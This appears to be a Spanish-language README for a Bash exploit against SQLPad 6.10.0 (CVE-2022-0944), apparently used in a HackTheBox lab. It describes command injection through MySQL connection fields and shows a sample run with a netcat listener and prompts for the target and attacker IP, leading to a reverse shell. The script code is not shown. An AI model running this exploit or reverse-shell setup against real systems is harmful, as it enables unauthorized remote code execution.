
Refurbish
Este script en Bash explota una vulnerabilidad RCE en SQLPad 6.10.0, permitiendo a un atacante lograr ejecución remota de código (RCE) abusando de los campos host y database en la configuración de conexión MySQL de SQLPad. El exploit aprovecha el manejo no sanitizado del módulo child_process en Node.js por parte de SQLPad para ejecutar comandos arbitrarios, abriendo finalmente una shell inversa en la máquina del atacante.
nc -lvnp 9001.┌──(kali㉿kali)-[~/HTB/machines/sightless]
└─$ ./CVE-2022-0944
Por favor, asegúrate de iniciar un listener en tu máquina atacante usando el comando:
nc -lvnp 9001
Esperando a que configures el listener...
Presiona [Enter] cuando estés listo...
Proporciona el host objetivo (ej., x.x.com):
x.example.com
Proporciona tu dirección IP (ej., 10.10.16.3):
0.0.0.0
Exploit enviado. Si todo salió bien, revisa tu listener para una conexión en el puerto 9001.
Este código es solo con fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Utiliza este exploit solo con permiso.